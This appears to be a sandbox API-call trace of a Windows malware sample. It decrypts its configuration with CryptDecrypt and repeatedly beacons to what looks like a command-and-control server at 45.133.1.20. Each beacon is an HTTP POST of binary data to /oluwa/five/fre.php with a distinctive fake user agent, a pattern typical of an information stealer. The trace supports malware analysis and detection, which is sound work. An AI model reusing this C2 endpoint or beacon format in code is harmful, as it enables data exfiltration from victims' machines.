[0244.962] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0244.962] GetProcessHeap () returned 0x6a0000 [0244.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0244.963] GetProcessHeap () returned 0x6a0000 [0244.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0244.963] GetProcessHeap () returned 0x6a0000 [0244.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0244.963] GetProcessHeap () returned 0x6a0000 [0244.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0244.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.964] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.976] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0244.984] GetProcessHeap () returned 0x6a0000 [0244.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0244.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.986] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0244.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.987] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.988] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.988] GetProcessHeap () returned 0x6a0000 [0244.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0244.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.990] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0244.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.992] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0244.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.995] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0244.995] GetProcessHeap () returned 0x6a0000 [0244.995] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0244.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.996] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0244.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.997] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0244.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.999] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0245.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.001] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0245.001] GetProcessHeap () returned 0x6a0000 [0245.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0245.001] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0245.001] GetProcessHeap () returned 0x6a0000 [0245.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0245.001] socket (af=2, type=1, protocol=6) returned 0x7e8 [0245.002] connect (s=0x7e8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0245.030] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0245.030] GetProcessHeap () returned 0x6a0000 [0245.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0245.030] GetProcessHeap () returned 0x6a0000 [0245.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0245.031] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0245.032] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0245.032] GetProcessHeap () returned 0x6a0000 [0245.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c54b8 [0245.032] GetProcessHeap () returned 0x6a0000 [0245.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0245.033] GetProcessHeap () returned 0x6a0000 [0245.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0245.033] GetProcessHeap () returned 0x6a0000 [0245.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0245.034] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0245.035] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0245.035] GetProcessHeap () returned 0x6a0000 [0245.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0245.035] GetProcessHeap () returned 0x6a0000 [0245.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0245.035] send (s=0x7e8, buf=0x6bd460*, len=242, flags=0) returned 242 [0245.036] send (s=0x7e8, buf=0x6bb998*, len=159, flags=0) returned 159 [0245.036] GetProcessHeap () returned 0x6a0000 [0245.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0245.036] recv (in: s=0x7e8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0245.111] GetProcessHeap () returned 0x6a0000 [0245.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0245.112] GetProcessHeap () returned 0x6a0000 [0245.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0245.114] GetProcessHeap () returned 0x6a0000 [0245.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c54b8 | out: hHeap=0x6a0000) returned 1 [0245.115] GetProcessHeap () returned 0x6a0000 [0245.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0245.116] closesocket (s=0x7e8) returned 0 [0245.116] GetProcessHeap () returned 0x6a0000 [0245.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0245.116] GetProcessHeap () returned 0x6a0000 [0245.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0245.117] GetProcessHeap () returned 0x6a0000 [0245.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0245.118] GetProcessHeap () returned 0x6a0000 [0245.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0245.119] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x151c) returned 0x7e8 [0245.121] Sleep (dwMilliseconds=0xea60) [0245.122] GetProcessHeap () returned 0x6a0000 [0245.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0245.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.124] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.133] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0245.143] GetProcessHeap () returned 0x6a0000 [0245.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0245.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.144] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0245.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.145] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.151] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.151] GetProcessHeap () returned 0x6a0000 [0245.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0245.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.160] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0245.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.161] CryptDestroyKey (hKey=0x6ad020) returned 1 [0245.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.163] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0245.163] GetProcessHeap () returned 0x6a0000 [0245.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0245.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.164] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0245.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.165] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0245.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.167] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0245.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.168] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0245.168] GetProcessHeap () returned 0x6a0000 [0245.168] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0245.168] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0245.169] GetProcessHeap () returned 0x6a0000 [0245.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0245.170] GetProcessHeap () returned 0x6a0000 [0245.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0245.171] GetProcessHeap () returned 0x6a0000 [0245.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0245.171] GetProcessHeap () returned 0x6a0000 [0245.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0245.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.179] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0245.188] GetProcessHeap () returned 0x6a0000 [0245.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0245.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.189] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0245.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.190] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.191] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.191] GetProcessHeap () returned 0x6a0000 [0245.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0245.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.192] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0245.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.193] CryptDestroyKey (hKey=0x6ad020) returned 1 [0245.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.194] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0245.194] GetProcessHeap () returned 0x6a0000 [0245.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0245.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.195] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0245.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.196] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0245.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.197] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0245.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.197] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0245.198] GetProcessHeap () returned 0x6a0000 [0245.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0245.198] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0245.198] GetProcessHeap () returned 0x6a0000 [0245.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0245.198] socket (af=2, type=1, protocol=6) returned 0x7ec [0245.198] connect (s=0x7ec, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0245.223] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0245.223] GetProcessHeap () returned 0x6a0000 [0245.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0245.223] GetProcessHeap () returned 0x6a0000 [0245.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dbf30 [0245.224] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0245.225] wvsprintfA (in: param_1=0x6dbf30, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0245.225] GetProcessHeap () returned 0x6a0000 [0245.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4bb8 [0245.225] GetProcessHeap () returned 0x6a0000 [0245.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0245.225] GetProcessHeap () returned 0x6a0000 [0245.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0245.226] GetProcessHeap () returned 0x6a0000 [0245.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dbf30 [0245.226] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0245.227] wvsprintfA (in: param_1=0x6dbf30, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0245.227] GetProcessHeap () returned 0x6a0000 [0245.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0245.227] GetProcessHeap () returned 0x6a0000 [0245.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dbf30 | out: hHeap=0x6a0000) returned 1 [0245.228] send (s=0x7ec, buf=0x6bd460*, len=242, flags=0) returned 242 [0245.229] send (s=0x7ec, buf=0x6bb998*, len=159, flags=0) returned 159 [0245.229] GetProcessHeap () returned 0x6a0000 [0245.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0245.229] recv (in: s=0x7ec, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0245.299] GetProcessHeap () returned 0x6a0000 [0245.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0245.300] GetProcessHeap () returned 0x6a0000 [0245.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0245.300] GetProcessHeap () returned 0x6a0000 [0245.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4bb8 | out: hHeap=0x6a0000) returned 1 [0245.301] GetProcessHeap () returned 0x6a0000 [0245.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0245.301] closesocket (s=0x7ec) returned 0 [0245.302] GetProcessHeap () returned 0x6a0000 [0245.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0245.302] GetProcessHeap () returned 0x6a0000 [0245.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0245.302] GetProcessHeap () returned 0x6a0000 [0245.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0245.303] GetProcessHeap () returned 0x6a0000 [0245.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0245.303] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1520) returned 0x7ec [0245.305] Sleep (dwMilliseconds=0xea60) [0245.307] GetProcessHeap () returned 0x6a0000 [0245.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0245.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.308] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0245.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.354] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0245.638] GetProcessHeap () returned 0x6a0000 [0245.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0245.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.639] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0245.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.705] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0245.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.707] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0245.707] GetProcessHeap () returned 0x6a0000 [0245.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0245.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.710] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0245.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.711] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0245.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0245.713] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0245.713] GetProcessHeap () returned 0x6a0000 [0245.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0245.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.718] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0245.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.719] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0245.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.722] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0245.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0245.724] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0245.724] GetProcessHeap () returned 0x6a0000 [0245.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0245.740] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0245.740] GetProcessHeap () returned 0x6a0000 [0245.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0245.741] GetProcessHeap () returned 0x6a0000 [0245.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0245.742] GetProcessHeap () returned 0x6a0000 [0245.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 